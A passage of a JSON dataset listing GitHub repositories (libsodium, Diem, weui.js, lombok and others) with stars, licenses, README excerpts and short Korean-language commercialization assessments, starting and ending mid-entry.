Card](https://goreportcard.com/badge/github.com/redis/go-redis/v9)](https://goreportcard.com/report/github.com/redis/go-redis/v9)\n[![codecov](https://codecov.io/github/redis/go-redis/graph/badge.svg?token=tsrCZKuSSw)](https://codecov.io/github/redis/go-redis)\n\n[![Discord](https://img.shields.io/discord/697882427875393627.svg?style=social&logo=discord)](https://discord.gg/W4txy5AeKM)\n[![Twitch](https://img.shields.io/twitch/status/redisinc?style=social)](https://www.twitch.tv/redisinc)\n[![YouTube](https://img.shields.io/youtube/channel/views/UCD78lHSwYqMlyetR0_P4V","composite_score":0.105,"license_safety_tag":"safe"},{"name":"jedisct1/libsodium","github_url":"https://github.com/jedisct1/libsodium","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":1,"description":"# libsodium 저장소 분석\n\n## 왜 보물인가\n인터넷 뱅킹, 메신저, 온라인 쇼핑 등 개인정보를 지키는 암호화 기술의 핵심 기반이 되는 신뢰성 높은 보안 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 저장소 서비스가 사용자 파일을 암호화하여 보관할 때 필수 기술 적용\n- **내부 업무 도구**: 기업의 민감한 고객","readme_excerpt":"[![GitHub CI](https://github.com/jedisct1/libsodium/workflows/CI/badge.svg)](https://github.com/jedisct1/libsodium/actions)\n[![Coverity Scan Build Status](https://scan.coverity.com/projects/2397/badge.svg)](https://scan.coverity.com/projects/2397)\n[![Azure build status](https://jedisct1.visualstudio.com/Libsodium/_apis/build/status/jedisct1.libsodium?branchName=stable)](https://jedisct1.visualstudio.com/Libsodium/_build/latest?definitionId=3&branchName=stable)\n[![CodeQL scan](https://github.com/jedisct1/libsodium/workflows/CodeQL%20scan/badge.svg)](https://github.com/jedisct1/libsodium/actions)\n\n# ![libsodium](https://raw.github.com/jedisct1/libsodium/master/logo.png)\n\nSodium is an easy-to-use software library that provides a wide range of cryptographic operations including encryption, decryption, digital signatures, and secure password hashing.\n\nIt is a portable, cross-compilable, installable, and packageable fork of [NaCl](http://nacl.cr.yp.to/). While maintaining API compatibility, ","composite_score":0.1045,"license_safety_tag":"unknown"},{"name":"diem/diem","github_url":"https://github.com/diem/diem","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# Diem 저장소 분석\n\n## 왜 보물인가\n글로벌 결제 시스템을 만든 Meta(페이스북)의 블록체인 기술로, 국경 없이 빠르고 저렴하게 돈을 보낼 수 있는 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **국제 송금 SaaS**: 개인과 소상공인이 해외로 돈을 보낼 때 기존 은행 수수료(5-10%)보다 훨씬 싼 비용으로 송금하는 서비스\n2. **기업 간 ","readme_excerpt":"> **Note to readers:** Silvergate Capital Corporation announced in January 2022 that it acquired intellectual property and other technology assets related to running a blockchain-based payment network from Diem, further investing in its platform and enhancing its existing stablecoin infrastructure.\n<a href=\"https://developers.diem.com\">\n\t<img width=\"200\" src=\"./.assets/diem.png\" alt=\"Diem Logo\" />\n</a>\n\n---\n\n[![Diem Rust Crate Documentation (main)](https://img.shields.io/badge/docs-main-59f)](https://diem.github.io/diem/)\n[![License](https://img.shields.io/badge/license-Apache-green.svg)](LICENSE)\n[![grcov](https://img.shields.io/badge/Coverage-grcov-green)](https://ci-artifacts.diem.com/coverage/unit-coverage/latest/index.html)\n[![test history](https://img.shields.io/badge/Test-History-green)](https://ci-artifacts.diem.com/testhistory/diem/diem/auto/ci-test.yml/index.html)\n\nDiem Core implements a decentralized, programmable distributed ledger which provides a financial infrastructure ","composite_score":0.1044,"license_safety_tag":"safe"},{"name":"Tencent/weui.js","github_url":"https://github.com/Tencent/weui.js","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":6,"description":"# Tencent/weui.js 평가 보고서\n\n## 왜 보물인가\n텐센트가 만든 중국 최대 메신저 앱의 UI 디자인을 그대로 사용할 수 있어서, 중국 사용자에게 익숙한 인터페이스를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중국 고객 대상의 웹 애플리케이션(CRM, 협업 도구 등)을 저렴하게 개발\n- **내부 업무 도","readme_excerpt":"weui.js\n=====\n\n[![npm version](https://img.shields.io/npm/v/weui.js.svg)](https://www.npmjs.org/package/weui.js/)\n\n\n### 概述\n\n[WeUI](https://github.com/Tencent/weui.git) 的轻量级 js 封装。\n\n注意：由于微信小程序不支持dom操作，所以weui.js并不适用于小程序。不过WeUI也为小程序开发了另外的版本，详情请看：https://github.com/Tencent/weui-wxss/\n\n### 手机预览\n\n![https://weui.io](https://cloud.githubusercontent.com/assets/2395166/20742697/96705822-b70c-11e6-9486-c03a5939a1d6.png)\n\n[https://weui.io/weui.js/](https://weui.io/weui.js/)\n\n\n### 开发\n\n安装\n\n```shell\ngit clone https://github.com/Tencent/weui.js.git\ncd weui.js\nnpm install\nnpm start\n```\n\n编译\n\n```shell\nnpm run build\n```\n\n\n### 使用\n\n#### global \n\n```html\n<link rel=\"stylesheet\" href=\"https://res.wx.qq.com/t/wx_fed/weui-source/res/2.5.16/weui.min.css\">\n<script type=\"text/javascript\" src=\"https://res.wx.qq.com/t/wx_fed/weui.js/res/1.2.21/weui.min.js\"></script>\n<script type=\"text/javascript\">\n    weui.alert('alert');\n</script>\n```\n\n#### import as module\n\n```javascript\nimport 'weui';\nimport weui from 'weui.js';\n\n","composite_score":0.1041,"license_safety_tag":"unknown"},{"name":"money-takers/polymarket-arbitrage-trading-bot","github_url":"https://github.com/money-takers/polymarket-arbitrage-trading-bot","stars":186,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1039,"license_safety_tag":"unknown"},{"name":"btroncone/learn-rxjs","github_url":"https://github.com/btroncone/learn-rxjs","stars":5,"language":"TypeScript","license":"mit","abandonment_months":7,"description":"# RxJS 학습 자료 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 복잡한 데이터 흐름을 간단하게 다루는 방법을 배울 수 있는 실무 교재입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 채팅, 알림 등 끊임없이 변하는 정보를 화면에 표시하는 웹 서비스\n2. **대시보드 내부 도구**: 회사 내부에서 여러 시스","readme_excerpt":"# Introduction\n\nClear examples, explanations, and resources for RxJS.\n\n_By_ [_@btroncone_](https://twitter.com/BTroncone)\n\n## Introduction\n\n[RxJS](https://github.com/ReactiveX/rxjs) is one of the hottest libraries in web\ndevelopment today. Offering a powerful, functional approach for dealing with\nevents and with integration points into a growing number of frameworks,\nlibraries, and utilities, the case for learning Rx has never been more\nappealing. Couple this with the ability to utilize your knowledge across\n[nearly any language](http://reactivex.io/languages.html), having a solid grasp\non reactive programming and what it can offer seems like a no-brainer.\n\n**But...**\n\nLearning RxJS and reactive programming is\n[hard](https://twitter.com/hoss/status/742643506536153088). There's the\nmultitude of concepts, large API surface, and fundamental shift in mindset from\nan\n[imperative to declarative style](https://tylermcginnis.com/imperative-vs-declarative-programming/).\nThis site focuses on mak","composite_score":0.1038,"license_safety_tag":"safe"},{"name":"xtianmiller/emergence.js","github_url":"https://github.com/xtianmiller/emergence.js","stars":8,"language":"JavaScript","license":"mit","abandonment_months":8,"description":"# emergence.js 분석 보고서\n\n## 왜 보물인가\n복잡한 패턴을 자동으로 인식하고 학습하는 기술로, 인공지능이 필요한 모든 비즈니스에서 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 SaaS**\n- 고객 행동 패턴을 자동으로 분석하는 분석 도구를 구독 형태로 판매\n\n**2. 이상 거래 탐지 API**\n- 금융사나 전자상거래","readme_excerpt":"[![Emergence.js - detect element visibility in the browser](https://xtianmiller.github.io/emergence.js/dist/images/emergence-title.png#2)](https://xtianmiller.github.io/emergence.js)\n\nEmergence.js is a lightweight, high-performance JS plugin for detecting and manipulating elements in the browser.\n\n[![Emergence.js - detect element visibility in the browser](https://xtianmiller.github.io/emergence.js/dist/images/emergence-hero.png#2)](https://xtianmiller.github.io/emergence.js)\n\n***\n\n[![License: MIT](https://img.shields.io/badge/license-MIT-00ddd0.svg)](https://opensource.org/licenses/MIT)\n[![NPM version](https://img.shields.io/badge/npm-v1.1.2-00ddd0.svg)](https://www.npmjs.com/package/emergence.js)\n[![CDNJS version](https://img.shields.io/cdnjs/v/emergence.js.svg)](https://cdnjs.com/libraries/emergence.js)\n\n- Dependency-free\n- IE8+ and all modern browsers\n- 1KB minified and gzipped\n\n**[View Demo](https://xtianmiller.github.io/emergence.js)**\n\n***\n\n## Why Use It?\nThis plugin is designed","composite_score":0.1036,"license_safety_tag":"safe"},{"name":"alibaba/x-render","github_url":"https://github.com/alibaba/x-render","stars":12,"language":"TypeScript","license":"unknown","abandonment_months":3,"description":"# alibaba/x-render 평가 보고서\n\n## 왜 보물인가\n웹 페이지를 자동으로 그리는 기술을 알리바바가 만들었으니, 큰 회사도 필요로 하는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **보고서 자동 생성 서비스**: 기업이 데이터를 입력하면 자동으로 예쁜 보고서 PDF를 만들어주는 서비스\n2. **이메일 템플릿 도구**: 마케팅팀이 복잡한","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://xrender.fun/\" target=\"_blank\"><img src=\"https://img.alicdn.com/tfs/TB17UtINiLaK1RjSZFxXXamPFXa-606-643.png\" alt=\"logo\" width=\"20%\"/></a>\n</p>\n<h1 align= \"center\">\n<a href=\"https://xrender.fun/\" target=\"_blank\">XRender</a>\n</h1>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/form-render?_blank\">\n    <img alt=\"npm\" src=\"https://img.shields.io/npm/v/form-render.svg?maxAge=3600&style=flat-square\"></a>\n  <a href=\"https://github.com/alibaba/form-render/commits/dev\">\n    <img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/alibaba/form-render.svg?style=flat-square\"></a>\n  <a href=\"https://github.com/alibaba/form-render\">\n    <img alt=\"GitHub repo size\" src=\"https://img.shields.io/github/repo-size/alibaba/form-render\"></a>\n  <a href=\"https://github.com/alibaba/form-render/issues?utf8=%E2%9C%93&q=\">\n    <img alt = \"GitHub closed issues\" src=\"https://img.shields.io/github/issues-closed/alibaba/form-render.svg?style=flat-","composite_score":0.1035,"license_safety_tag":"unknown"},{"name":"chartbrew/chartbrew","github_url":"https://github.com/chartbrew/chartbrew","stars":84,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# Chartbrew 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 데이터베이스에서 정보를 뽑아서 보기 좋은 그래프와 대시보드로 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 중소 기업의 매출·고객 데이터를 자동으로 분석하고 시각화해주는 구독형 분석 서비스로 제공\n\n**내부 업무 도구**: 회사의 판매량, 재고, 직원 성과 등","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://chartbrew.com\">\n    <img src=\"https://chartbrew-static.b-cdn.net/banners/banner_dark_mode.svg\" alt=\"ChartBrew logo\" />\n  </a>\n</a>\n\n<br />\n\n<p align=\"center\">\n  <a href=\"https://discord.gg/KwGEbFk\" target=\"_blank\"><img src=\"https://img.shields.io/discord/656557151048957995?label=Discord\" alt=\"\" /></a>\n  <a href=\"https://hub.docker.com/r/razvanilin/chartbrew\" target=\"_blank\"><img alt=\"Docker Pulls\" src=\"https://img.shields.io/docker/pulls/razvanilin/chartbrew\"></a>\n  <a href=\"https://github.com/chartbrew/chartbrew/actions/workflows/ci.yml\" target=\"_blank\"><img alt=\"CI Status\" src=\"https://github.com/chartbrew/chartbrew/actions/workflows/ci.yml/badge.svg\"></a>\n</p>\n\n<p align=\"center\">\n  <strong>\n    <a href=\"https://chartbrew.com\">Chartbrew</a> is an open-source web application that can connect directly to databases and APIs and use the data to create beautiful charts. It features a chart builder, editable dashboards, embedable charts, query & reques","composite_score":0.1028,"license_safety_tag":"unknown"},{"name":"classgraph/classgraph","github_url":"https://github.com/classgraph/classgraph","stars":5,"language":"Java","license":"mit","abandonment_months":8,"description":"# ClassGraph 저장소 분석\n\n## 왜 보물인가\n자바 프로그램의 구조를 자동으로 분석하고 분류해주는 도구로, 복잡한 코드를 정리하는 데 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 소프트웨어 품질을 자동으로 검사하고 리포트하는 웹 서비스\n2. **내부 업무 도구**: 대기업의 IT 부서가 수천 개 프로젝트의 ","readme_excerpt":"# ClassGraph\n\n<img alt=\"ClassGraph Logo\" height=\"320\" width = \"320\" src=\"https://github.com/classgraph/classgraph/wiki/ClassGraphLogo.png\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img alt=\"Duke Award logo\" height=\"320\" src=\"https://github.com/classgraph/classgraph/wiki/Duke-noborder.png\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href=\"https://github.com/classgraph/classgraph/wiki/OSPB-award-letter.pdf\"><img alt=\"Google Open Source Peer Bonus logo\" height=\"320\" src=\"https://github.com/classgraph/classgraph/wiki/OSPB-logo.png\"></a>\n\nClassGraph is an uber-fast parallelized classpath scanner and module scanner for Java, Scala, Kotlin and other JVM languages.\n\n| _ClassGraph won a Duke's Choice Award (a recognition of the most useful and/or innovative software in the Java ecosystem) at Oracle Code One 2018, and a Google Open Source Peer Bonus award in 2022._ Thanks to all the users who have reported bugs, requested features, offered suggestions, and submitted pull requests to help get ClassGraph to","composite_score":0.1026,"license_safety_tag":"safe"},{"name":"sachmalan/kalshi-trading-bot","github_url":"https://github.com/sachmalan/kalshi-trading-bot","stars":150,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1022,"license_safety_tag":"unknown"},{"name":"zuiidea/antd-admin","github_url":"https://github.com/zuiidea/antd-admin","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# antd-admin 저장소 분석\n\n## 왜 보물인가\n회사의 업무용 관리 시스템을 빠르게 만들 수 있는 디자인 템플릿 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터를 관리하는 클라우드 서비스의 기본 화면으로 활용\n- **내부 업무 도구**: 직원들이 사용하는 인사 관리, 재고 관리 시스템의 뼈대로 사용\n- **API 판매","readme_excerpt":"# Antd Admin\n\n## Introduction\n\nAntd Admin provides production-style admin templates with modern frontend tooling, mock-first development, and practical testing coverage.\n\nAvailable templates:\n\n- `basic`: English-only setup\n- `with-lingui`: Bilingual setup (`en` + `zh`) with Lingui\n\nScaffolding CLI:\n\n- `init-antd-admin` (from `packages/create`)\n\n## Key Features\n\n- JWT login with access/refresh flow\n- Backend-driven menu and permission guards\n- URL-synced table state (pagination, sorting, search)\n- Dark mode theme switching\n- Mock-first local development (no backend required)\n- Typed API boundaries and reusable CRUD patterns\n- React 19 + Ant Design 6 + TanStack Router/Query + Zustand + Zod\n- Optional Lingui-based i18n workflow (`with-lingui`)\n- E2E coverage with Playwright\n\n## Quick Start\n\nUse `init-antd-admin` to scaffold a standalone app from official templates.\n\n### Interactive\n\n```bash\nnpx init-antd-admin@latest\npnpm dlx init-antd-admin@latest\nyarn dlx init-antd-admin@latest\nbunx ini","composite_score":0.1021,"license_safety_tag":"safe"},{"name":"r3econ/spacequest-ios","github_url":"https://github.com/r3econ/spacequest-ios","stars":5,"language":"Swift","license":"GPL-3.0","abandonment_months":0,"description":"# SpaceQuest iOS 저장소 분석\n\n## 왜 보물인가\niOS에서 작동하는 우주 탐험 게임으로, 모바일 게임 시장에서 니치한 장르를 차지하고 있어 앱 스토어에서 차별화된 콘텐츠로 판매 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 게임 SaaS**: 구독형 게임 플랫폼(Apple Arcade, Google Play Pass)에 콘텐츠 공급\n","readme_excerpt":"[![CodeFactor](https://www.codefactor.io/repository/github/r3econ/spacequest-ios/badge)](https://www.codefactor.io/repository/github/r3econ/spacequest-ios)\n[![License](https://img.shields.io/badge/license-GNU%20GPLv3-brightgreen.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html)\n![Platform](https://img.shields.io/badge/platform-ios-lightgrey.svg)\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/IkQOLmG.png\" alt=\"Spacequest gameplay screenshot\">\n</p>\n\n# Spacequest for iOS 🚀\n\nA side-scrolling shoot 'em up written in **Swift** with **SpriteKit**. Built across Swift versions (2014–present).\n\n## Features\n\n- **Particle systems** — jet engine bursts on the player's ship, explosions, debris\n- **Collision detection** — per-frame hit testing between player, enemies, and projectiles\n- **Custom HUD** — virtual joystick for movement, action buttons, score display\n- **Sound effects** — firing, explosions, enemy hits, and a background music loop\n- **Hand-drawn art** — all vector graphics and imag","composite_score":0.1021,"license_safety_tag":"restricted"},{"name":"meilisearch/MeiliSearch","github_url":"https://github.com/meilisearch/MeiliSearch","stars":15,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"# MeiliSearch 상업화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 원하는 정보를 빠르고 정확하게 찾을 수 있도록 도와주는 검색 엔진으로, 구글 검색처럼 편리한 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 SaaS**: 온라인 쇼핑몰이 상품을 빠르게 검색할 수 있는 기능을 기본으로 제공\n- **내부 업무 도구**: 회사 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://www.meilisearch.com/?utm_campaign=oss&utm_source=github&utm_medium=meilisearch&utm_content=logo#gh-light-mode-only\" target=\"_blank\">\n    <img src=\"assets/meilisearch-logo-light.svg?sanitize=true#gh-light-mode-only\">\n  </a>\n  <a href=\"https://www.meilisearch.com/?utm_campaign=oss&utm_source=github&utm_medium=meilisearch&utm_content=logo#gh-dark-mode-only\" target=\"_blank\">\n    <img src=\"assets/meilisearch-logo-dark.svg?sanitize=true#gh-dark-mode-only\">\n  </a>\n</p>\n\n<h4 align=\"center\">\n  <a href=\"https://www.meilisearch.com/?utm_campaign=oss&utm_source=github&utm_medium=meilisearch&utm_content=nav\">Website</a> |\n  <a href=\"https://roadmap.meilisearch.com/tabs/1-under-consideration\">Roadmap</a> |\n  <a href=\"https://www.meilisearch.com/pricing?utm_campaign=oss&utm_source=github&utm_medium=meilisearch&utm_content=nav\">Meilisearch Cloud</a> |\n  <a href=\"https://blog.meilisearch.com/?utm_campaign=oss&utm_source=github&utm_medium=meilisearch&utm_content=nav","composite_score":0.102,"license_safety_tag":"unknown"},{"name":"Lone-Coder/letsencrypt-win-simple","github_url":"https://github.com/Lone-Coder/letsencrypt-win-simple","stars":6,"language":"C#","license":"apache-2.0","abandonment_months":6,"description":"# Lone-Coder/letsencrypt-win-simple 분석\n\n## 왜 보물인가\nWindows 서버에서 무료 보안 인증서를 자동으로 설치해주는 도구로, 기업들이 매년 수십만 원의 인증서 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 보안 관리 플랫폼으로, 중소 기업 고객들의 SSL 인증서를 자동 갱신","readme_excerpt":"<a href=\"https://zerossl.com\">\n<picture>\n  <!-- Dark mode -->\n  <source\n    media=\"(prefers-color-scheme: dark)\"\n    srcset=\"https://github.com/win-acme/win-acme/blob/master/win-acme_banner_rounded_dark.png\" />\n  <!-- Light mode -->\n  <source\n    media=\"(prefers-color-scheme: light)\"\n    srcset=\"https://github.com/win-acme/win-acme/blob/master/win-acme_banner_rounded_light.png\" />\n  <!-- Fallback for environments without media queries -->\n  <img\n    alt=\"ZeroSSL\"\n    src=\"https://github.com/win-acme/win-acme/blob/master/win-acme_banner_rounded_light.png\"\n    height=\"auto\" />\n</picture>\n</a>\n\n# win-acme\n\nThis is a ACMEv2 client for Windows that aims to be very simple to start with, but powerful enough to grow into almost every scenario.\n\n* A very simple interface to create and install certificates on a local IIS server\n* A more advanced interface for many other use cases, including Apache and Exchange\n* Automatically creates a scheduled task to renew certificates when needed\n* Get certi","composite_score":0.1017,"license_safety_tag":"safe"},{"name":"ninjamuffin99/Funkin","github_url":"https://github.com/ninjamuffin99/Funkin","stars":8,"language":"Haxe","license":"NOASSERTION","abandonment_months":0,"description":"# Funkin 저장소 분석\n\n## 왜 보물인가\n유명한 음악 리듬 게임을 무료로 공개한 소스 코드로, 게임 개발 학습과 창작물 제작에 활용할 수 있는 완성된 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 교육 플랫폼**: 초보 게임 개발자를 위한 온라인 강좌나 튜토리얼 서비스로 제공\n2. **모드 창작 커뮤니티 운영**: 사용자가 자신만의","readme_excerpt":"<div align='center'><img src=\"docs/readme_images/FNF_logo.png\" width=\"800\">\n\n<h2>Friday Night Funkin' is a rhythm game. Built using HaxeFlixel for <a href=\"https://ldjam.com/events/ludum-dare/47\">Ludum Dare 47.</a></h2>\n\nThis game was made with love to Newgrounds and its community. Extra love to Tom Fulp.\n\n</div>\n\n- [Playable web demo on Newgrounds!](https://www.newgrounds.com/portal/view/770371)\n- [Demo download builds for Windows, Mac, and Linux from Itch.io!](https://ninja-muffin24.itch.io/funkin)\n- [Download Android builds from Google Play!](https://play.google.com/store/apps/details?id=me.funkin.fnf)\n- [Download iOS builds from the App Store!](https://apps.apple.com/app/id6740428530)\n\n<div align='center'>\n<table>\n  <tr>\n    <td><img src=\"docs/readme_images/Title_Card.gif\" alt=\"Title Screen\" width=\"350\"/></td>\n    <td><img src=\"docs/readme_images/Menu.png\" alt=\"Main Menu\" width=\"350\"/></td>\n  </tr>\n</table>\n</div>\n\n# Getting Started\n\n**PLEASE USE THE LINKS ABOVE IF YOU JUST WANT TO","composite_score":0.1016,"license_safety_tag":"unknown"},{"name":"madebygps/self-taught-guide-to-cloud-computing","github_url":"https://github.com/madebygps/self-taught-guide-to-cloud-computing","stars":112,"language":"CSS","license":"NOASSERTION","abandonment_months":3,"description":"# madebygps/self-taught-guide-to-cloud-computing 분석\n\n## 왜 보물인가\n클라우드 컴퓨팅을 독학으로 배우고 싶은 사람들을 위한 실용적인 길잡이로, 누구나 따라할 수 있는 무료 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 학습 플랫폼으로 개인과 기업에 월 구독료를 받고 제공\n2. ","readme_excerpt":"# Welcome\n\n[![Azure Static Web Apps CI/CD](https://github.com/learntocloud/learn-to-cloud/actions/workflows/azure-static-web-apps-agreeable-forest-05e8c1b0f.yml/badge.svg?branch=main)](https://github.com/learntocloud/learn-to-cloud/actions/workflows/azure-static-web-apps-agreeable-forest-05e8c1b0f.yml)\n[![CodeQL Code Scanning](https://github.com/learntocloud/learn-to-cloud/actions/workflows/codeql-code-scanning.yml/badge.svg)](https://github.com/learntocloud/learn-to-cloud/actions/workflows/codeql-code-scanning.yml)\n\nLearn to Cloud (L2C) is a courseware built on the belief that anyone can learn foundational cloud engineering skills with the right guide and discipline.\n\nThis guide is focused on helping you learn the skillset of a junior cloud engineer, not ANY other role.\n\nhttps://learntocloud.guide\n\n## Contributing\n\nPlease open an issue first so we can discuss before opening a PR. Thank you. \n\n## License\n\n[![CC BY 4.0][cc-by-shield]][cc-by]\n\nThis work is licensed under a [Creative Comm","composite_score":0.1016,"license_safety_tag":"unknown"},{"name":"sayanarijit/xplr","github_url":"https://github.com/sayanarijit/xplr","stars":7,"language":"Rust","license":"MIT","abandonment_months":5,"description":"# xplr 상용화 분석 보고서\n\n## 왜 보물인가\n파일과 폴더를 쉽게 탐색하고 관리할 수 있는 강력한 도구로, 컴퓨터 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 파일 관리 SaaS**\n- 기업의 수천 개 문서를 빠르게 찾고 정리하는 웹 기반 서비스로 제공\n\n**2. 개발자용 IDE 내장 도구**\n- 프로그래밍 소프","readme_excerpt":"<h1 align=\"center\">\n  ▸[<a href=\"https://github.com/sayanarijit/xplr/blob/main/assets/icon/xplr.svg\"><img src=\"https://s3.gifyu.com/images/xplr32.png\" alt=\"▓▓\" height=\"20\" width=\"20\" /></a> xplr]\n</h1>\n\n<p align=\"center\">\nA hackable, minimal, fast TUI file explorer\n</p>\n\n<p align=\"center\">\n\n<a href=\"https://crates.io/crates/xplr\">\n<img src=\"https://img.shields.io/crates/v/xplr.svg\" />\n</a>\n\n</p>\n\n<p align=\"center\">\n\nhttps://user-images.githubusercontent.com/11632726/166747867-8a4573f2-cb2f-43a6-a23d-c99fc30c6594.mp4\n\n</p>\n\n<h3 align=\"center\">\n  [<a href=\"https://xplr.dev/en/install\">Install</a>]\n  [<a href=\"https://xplr.dev/en\">Documentation</a>]\n  [<a href=\"https://xplr.dev/en/awesome-hacks\">Hacks</a>]\n  [<a href=\"https://xplr.dev/en/awesome-plugins\">Plugins</a>]\n  [<a href=\"https://xplr.dev/en/awesome-integrations\">Integrations</a>]\n</h3>\n\nxplr is a terminal UI based file explorer that aims to increase our terminal\nproductivity by being a flexible, interactive orchestrator for the ev","composite_score":0.1016,"license_safety_tag":"safe"},{"name":"rzwitserloot/lombok","github_url":"https://github.com/rzwitserloot/lombok","stars":11,"language":"Java","license":"mit","abandonment_months":0,"description":"# Lombok 저장소 분석\n\n## 왜 보물인가\n자바 프로그래밍 언어에서 개발자들이 반복적으로 작성해야 하는 보일러플레이트 코드를 자동으로 생성해주는 도구로, 개발 생산성을 대폭 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 자바 기반의 백엔드 서비스(예: 회계 관리, 재고 관리 솔루션)를 개발하는 스타트업이 개발 속도를 2-3배","readme_excerpt":"# Project Lombok\n\n**Project Lombok** is a java library that automatically plugs into your editor and build tools, spicing up your java.\nNever write another getter or equals method again, with one annotation your class has a fully featured builder, automate your logging variables, and much more.\n\nSee [LICENSE] for the Project Lombok license.\n\nLooking for professional support of Project Lombok? Lombok is now part of a [tidelift subscription]!\n\nFor a list of all authors, see the [AUTHORS] file. \n\nFor complete project information, a short tutorial on what lombok does, and how to download / use / install it, see [projectlombok.org]\n\nYou can review our security policy via [SECURITY.md]\n\n[LICENSE]: https://github.com/projectlombok/lombok/blob/master/LICENSE\n[AUTHORS]: https://github.com/projectlombok/lombok/blob/master/AUTHORS\n[SECURITY.md]: https://github.com/projectlombok/lombok/blob/master/SECURITY.md\n[projectlombok.org]: https://projectlombok.org/\n[tidelift subscription]: https://tidelift","composite_score":0.1012,"license_safety_tag":"safe"},{"name":"fangzesheng/free-api","github_url":"https://github.com/fangzesheng/free-api","stars":73,"language":"","license":"unknown","abandonment_months":2,"description":"# fangzesheng/free-api 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 무료 API 모음이라, 비용 걱정 없이 서비스를 만들 수 있는 기초 자료로 활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 초기 스타트업이 개발 비용을 절감하면서 AI·데이터 기반 서비스를 빠르게 구축할 때\n- **내부 업무 ","readme_excerpt":"### <b>为了方便广大的开发者，特此统计了网上诸多的免费API，为您收集免费的接口服务，做一个API的搬运工，以后会每月定时更新新的接口。有些接口来自第三方，在第三方注册就可以成为他们的会员，免费使用他们的部分接口</b>——您的star是我一直维护的动力 : )\n### <b>现已发布【免费API】公众号，关注公众号可以获取相关密钥，也可以接收到每月更新接口消息（每月一次，不打扰大家），希望大家多关注，随时来个三连加点击广告<b>——您的关注是我一直更新的动力 : )\n<div align=center>\n<img src=\"https://github.com/fangzesheng/free-api/blob/master/qrcode.gif\" width=\"180\" height=\"180\">\n</div>\n\n# 2026-03-29\n### 本月更新的接口有：[用户界面头像](#677)。\n* **<a id=\"677\">用户界面头像</a>:** 根据名字生成带有首字母的头像 [接口地址](https://www.free-api.com/doc/677)\n\n# 2026-02-25\n### 本月更新的接口有：[国内运营商基站信息](#676)。\n* **<a id=\"676\">国内运营商基站信息</a>:** 国内三网运营商基站位置信息数据查询 [接口地址](https://www.free-api.com/doc/676)\n\n# 2026-01-24\n### 本月更新的接口有：[火车票查询](#675)。\n* **<a id=\"675\">火车票查询</a>(可在线调用):** 支持查询高铁、动车等列车的实时票务信息，... [接口地址](https://www.free-api.com/doc/675)\n\n# 2025-12-31\n### 本月更新的接口有：[MBTI](#674)。\n* **<a id=\"674\">MBTI</a>(可在线调用):** MBTI人格测试经过了长达50多年的研究... [接口地址](https://www.free-api.com/doc/674)\n\n# 2025-11-30\n### 本月更新的接口有：[中文数字运算验证码](#673)。\n* **<a id=\"673\">中文数字运算验证码</a>(可在线调用):","composite_score":0.1007,"license_safety_tag":"unknown"},{"name":"alexflint/go-arg","github_url":"https://github.com/alexflint/go-arg","stars":10,"language":"Go","license":"bsd-2-clause","abandonment_months":5,"description":"# go-arg 저장소 분석\n\n## 왜 보물인가\n프로그램에 명령어를 입력할 때 복잡한 설정을 자동으로 처리해주는 도구로, 개발자의 반복 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 자동화 도구**: 직원이 사용할 관리 프로그램의 명령어 체계를 빠르게 만들어 운영 효율을 높입니다.\n2. **클라우드 서비스 CLI**: AWS","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"./.github/banner.jpg\" alt=\"go-arg\" height=\"250px\">\n  <br>\n  go-arg\n  </br>\n</h1>\n<h4 align=\"center\">Struct-based argument parsing for Go</h4>\n<p align=\"center\">\n  <a href=\"https://sourcegraph.com/github.com/alexflint/go-arg?badge\"><img src=\"https://sourcegraph.com/github.com/alexflint/go-arg/-/badge.svg\" alt=\"Sourcegraph\"></a>\n  <a href=\"https://pkg.go.dev/github.com/alexflint/go-arg\"><img 